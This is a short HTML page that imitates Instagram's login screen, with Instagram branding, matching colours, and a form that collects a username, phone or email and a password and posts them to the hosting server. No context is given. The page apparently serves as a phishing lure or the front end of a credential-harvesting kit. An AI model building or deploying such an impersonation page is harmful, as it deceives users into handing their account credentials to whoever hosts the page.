<!DOCTYPE html>
<html>
<head>
    <title>Instagram Login</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #fafafa; margin: 0; padding: 20px; }
        .container { max-width: 400px; margin: 50px auto; background: white; padding: 40px; border: 1px solid #dbdbdb; border-radius: 4px; text-align: center; }
        input { width: 100%; padding: 10px; margin: 8px 0; border: 1px solid #ccc; border-radius: 4px; }
        button { width: 100%; padding: 10px; background: #3897f0; color: white; border: none; border-radius: 4px; font-weight: bold; }
        button:hover { background: #2a76c4; }
    </style>
</head>
<body>
    <div class="container">
        <h2>Instagram</h2>
        <form method="POST">
            <input type="text" name="username" placeholder="Phone number, username, or email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>
    </div>
</body>
</html>